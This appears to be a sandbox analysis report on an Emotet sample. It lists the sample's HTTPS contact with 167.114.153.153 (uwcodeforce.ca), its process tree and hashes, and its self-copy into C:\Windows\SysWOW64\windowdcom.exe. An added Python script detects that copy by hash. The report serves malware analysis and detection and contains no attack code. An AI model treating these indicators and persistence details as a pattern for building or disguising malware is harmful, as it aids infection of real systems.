                                                                                                                                                HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Mar 28, 2021 19:31:41.351313114 CEST | 167.114.153.153 | 443 | 192.168.2.3 | 49744 | CN=uwcodeforce.ca | CN=R3, O=Let's Encrypt, C=US | Tue Feb 16 21:47:22 CET 2021 | Mon May 17 22:47:22 CEST 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,10-11-13-35-23-65281,29-23-24,0 | 51c64c77e60f3980eea90869b68c58a8
(chain) | | | | | CN=R3, O=Let's Encrypt, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Oct 07 21:21:40 CEST 2020 | Wed Sep 29 21:21:40 CEST 2021 | |

                                                                                                                                                Code Manipulations

                                                                                                                                                Statistics

                                                                                                                                                Behavior


                                                                                                                                                System Behavior

                                                                                                                                                General

Start time: 19:28:24
Start date: 28/03/2021
Path: C:\Users\user\Desktop\yxghUyIGb4.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\yxghUyIGb4.exe'
Imagebase: 0x820000
File size: 45568 bytes
MD5 hash: ECBC4B40DCFEC4ED1B2647B217DA0441
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.195274651.0000000000821000.00000020.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.196554240.0000000000821000.00000020.00020000.sdmp, Author: Joe Security
Reputation: low

                                                                                                                                                General

Start time: 19:28:25
Start date: 28/03/2021
Path: C:\Users\user\Desktop\yxghUyIGb4.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\yxghUyIGb4.exe
Imagebase: 0x820000
File size: 45568 bytes
MD5 hash: ECBC4B40DCFEC4ED1B2647B217DA0441
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000000.196238760.0000000000821000.00000020.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.203523658.0000000000821000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low

                                                                                                                                                General

                                                                                                                                                Start time:19:28:28
                                                                                                                                                Start date:28/03/2021
                                                                                                                                                Path:C:\Windows\SysWOW64\windowdcom.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Windows\SysWOW64\windowdcom.exe
                                                                                                                                                Imagebase:0x820000
                                                                                                                                                File size:45568 bytes
                                                                                                                                                MD5 hash:ECBC4B40DCFEC4ED1B2647B217DA0441
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.203168982.0000000000821000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000000.201989781.0000000000821000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low

                                                                                                                                                General

                                                                                                                                                Start time:19:28:28
                                                                                                                                                Start date:28/03/2021
                                                                                                                                                Path:C:\Windows\SysWOW64\windowdcom.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Windows\SysWOW64\windowdcom.exe
                                                                                                                                                Imagebase:0x820000
                                                                                                                                                File size:45568 bytes
                                                                                                                                                MD5 hash:ECBC4B40DCFEC4ED1B2647B217DA0441
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000000.202814564.0000000000821000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.1275643184.0000000000821000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low

                                                                                                                                                General

                                                                                                                                                Start time:19:28:54
                                                                                                                                                Start date:28/03/2021
                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                Imagebase:0x7ff7488e0000
                                                                                                                                                File size:51288 bytes
                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:19:29:05
                                                                                                                                                Start date:28/03/2021
                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                                Imagebase:0x7ff7488e0000
                                                                                                                                                File size:51288 bytes
                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:19:29:06
                                                                                                                                                Start date:28/03/2021
                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                                Imagebase:0x7ff7488e0000
                                                                                                                                                File size:51288 bytes
                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:19:29:07
                                                                                                                                                Start date:28/03/2021
                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                                Imagebase:0x7ff7488e0000
                                                                                                                                                File size:51288 bytes
                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:19:29:07
                                                                                                                                                Start date:28/03/2021
                                                                                                                                                Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                                Imagebase:0x7ff6ad1b0000
                                                                                                                                                File size:163336 bytes
                                                                                                                                                MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:19:29:08
                                                                                                                                                Start date:28/03/2021
                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                                Imagebase:0x7ff7488e0000
                                                                                                                                                File size:51288 bytes
                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:19:30:08
                                                                                                                                                Start date:28/03/2021
                                                                                                                                                Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                                                                                                                                                Imagebase:0x7ff7a6080000
                                                                                                                                                File size:455656 bytes
                                                                                                                                                MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:19:30:09
                                                                                                                                                Start date:28/03/2021
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff6b2800000
                                                                                                                                                File size:625664 bytes
                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:19:33:12
                                                                                                                                                Start date:28/03/2021
                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                Imagebase:0x7ff7488e0000
                                                                                                                                                File size:51288 bytes
                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:19:33:16
                                                                                                                                                Start date:28/03/2021
                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wisvc
                                                                                                                                                Imagebase:0x7ff7488e0000
                                                                                                                                                File size:51288 bytes
                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
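The process records above carry the report's persistence finding in raw form: C:\Windows\SysWOW64\windowdcom.exe has the same MD5 (ECBC4B40...) and size (45568 bytes) as the submitted yxghUyIGb4.exe, starts three seconds after it, and runs twice, which is the "Drops executables to the windows directory (C:\Windows) and starts them" behaviour from the signature list. The script below is an added example, not part of the original report and not Joe Sandbox code: it parses "General" blocks in the report's own Field:value layout and ties the copy back to the sample by hash rather than by file name. The REPORT text is a constructed input transcribed from four of the records above (field subset only); the function names are this example's own.

```python
"""Flag self-copy persistence in a Joe Sandbox-style process listing (added example)."""
from collections import defaultdict
from datetime import datetime

SAMPLE_MD5 = "ecbc4b40dcfec4ed1b2647b217da0441"   # MD5 of the submitted sample, from the report

# Constructed input: four of the report's process records, with the fields the rule needs.
REPORT = r"""
General

Start time:19:28:25
Start date:28/03/2021
Path:C:\Users\user\Desktop\yxghUyIGb4.exe
File size:45568 bytes
MD5 hash:ECBC4B40DCFEC4ED1B2647B217DA0441

General

Start time:19:28:28
Start date:28/03/2021
Path:C:\Windows\SysWOW64\windowdcom.exe
File size:45568 bytes
MD5 hash:ECBC4B40DCFEC4ED1B2647B217DA0441

General

Start time:19:28:28
Start date:28/03/2021
Path:C:\Windows\SysWOW64\windowdcom.exe
File size:45568 bytes
MD5 hash:ECBC4B40DCFEC4ED1B2647B217DA0441

General

Start time:19:28:54
Start date:28/03/2021
Path:C:\Windows\System32\svchost.exe
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
"""


def parse_processes(text):
    """Split the listing at each 'General' header; one dict of field -> value per process."""
    procs, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "General":
            current = {}
            procs.append(current)
        elif current is not None and ":" in line:
            key, _, value = line.partition(":")   # split on the first colon only: 'Start time:19:28:25'
            current[key.strip()] = value.strip()
    return [p for p in procs if p]


def find_self_copies(procs, sample_md5):
    """Processes that run the sample's bytes (MD5 match) from a path other than the original's.

    The earliest-listed run with the sample hash is taken as the submitted file itself;
    the hash, not the file name, is what ties a renamed copy back to the sample.
    """
    md5 = sample_md5.lower()
    same = [p for p in procs if p["MD5 hash"].lower() == md5]
    if not same:
        return []
    origin = same[0]["Path"].lower()
    return [p for p in same[1:] if p["Path"].lower() != origin]


def in_windows_dir(path):
    """True for paths under the Windows directory (System32, SysWOW64, ...)."""
    return path.lower().startswith("c:\\windows\\")


def started_at(proc):
    """Combine the report's separate date and time fields into one datetime."""
    return datetime.strptime(proc["Start date"] + " " + proc["Start time"], "%d/%m/%Y %H:%M:%S")


def first_copy_delay_seconds(procs, sample_md5):
    """Seconds from the sample's first start to the first start of a self-copy, or None."""
    copies = find_self_copies(procs, sample_md5)
    if not copies:
        return None
    origin = next(p for p in procs if p["MD5 hash"].lower() == sample_md5.lower())
    return int((min(started_at(c) for c in copies) - started_at(origin)).total_seconds())


def report(procs, sample_md5):
    """One finding line per distinct copy path: run count and whether it sits under C:\\Windows."""
    counts = defaultdict(int)
    for c in find_self_copies(procs, sample_md5):
        counts[c["Path"]] += 1
    return [f"{path}: {n} run(s), in Windows directory: {in_windows_dir(path)}"
            for path, n in sorted(counts.items())]


if __name__ == "__main__":
    procs = parse_processes(REPORT)
    for line in report(procs, SAMPLE_MD5):
        print(line)
    print("seconds from first execution to first self-copy:",
          first_copy_delay_seconds(procs, SAMPLE_MD5))
```

Keying on the hash is deliberate: the dropped name (windowdcom.exe) is chosen to blend in with system binaries and changes between samples, while the MD5 in the report is the same bytes. On a live host the equivalent check is a hash of the new file under C:\Windows against the hash of the initial execution, not a file-name allowlist.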

Disassembly

Code Analysis
